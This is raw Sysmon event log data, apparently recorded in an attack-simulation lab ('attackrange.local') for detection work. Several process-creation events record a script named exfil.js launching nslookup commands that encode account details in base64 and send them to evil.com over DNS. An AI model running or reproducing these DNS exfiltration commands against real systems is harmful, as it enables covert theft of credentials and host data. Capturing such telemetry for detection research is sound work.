14:16:44.478{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.478{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.478{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.478{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.478{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E541-000000005F02}7272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.478{2E1864BB-17A1-629A-783D-000000005F02}55524832C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-E541-000000005F02}7272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.490{2E1864BB-17CC-629A-E541-000000005F02}7272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlknrs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.478{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzwov.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000203998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.567{00000000-0000-0000-0000-000000000000}5608<unknown process>-udpfalsefalse127.0.0.1-53031-false127.0.0.1-53domain 354300x8000000000000000203997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.433{00000000-0000-0000-0000-000000000000}2444<unknown process>-udptruefalse127.0.0.1-53029-false127.0.0.1-53domain 354300x8000000000000000203996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.433{00000000-0000-0000-0000-000000000000}2444<unknown process>-udptruefalse127.0.0.1-53028-false127.0.0.1-53domain 354300x8000000000000000203995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.335{00000000-0000-0000-0000-000000000000}5740<unknown process>-udptruefalse127.0.0.1-53027-false127.0.0.1-53domain 354300x8000000000000000203994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:41.251{00000000-0000-0000-0000-000000000000}7824<unknown process>-udpfalsefalse127.0.0.1-53023-false127.0.0.1-53domain 10341000x8000000000000000203993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.462{2E1864BB-17CC-629A-E341-000000005F02}10282104C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-E441-000000005F02}3008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.461{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.461{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.460{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E441-000000005F02}3008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.459{2E1864BB-17CC-629A-E241-000000005F02}51361676C:\Windows\system32\cmd.exe{2E1864BB-17CC-629A-E441-000000005F02}3008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.459{2E1864BB-17CC-629A-E441-000000005F02}3008C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CC-629A-E241-000000005F02}5136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzwov.tmp 2>&1 10341000x8000000000000000203985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.441{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E341-000000005F02}1028C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.441{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CC-629A-E341-000000005F02}1028C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.425{2E1864BB-17CC-629A-E341-000000005F02}10282104C:\Windows\system32\conhost.exe{2E1864BB-17CC-629A-E241-000000005F02}5136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E341-000000005F02}1028C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CC-629A-E241-000000005F02}5136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.409{2E1864BB-17A1-629A-783D-000000005F02}55523448C:\Windows\System32\WScript.exe{2E1864BB-17CC-629A-E241-000000005F02}5136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.411{2E1864BB-17CC-629A-E241-000000005F02}5136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzwov.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000203974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.394{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 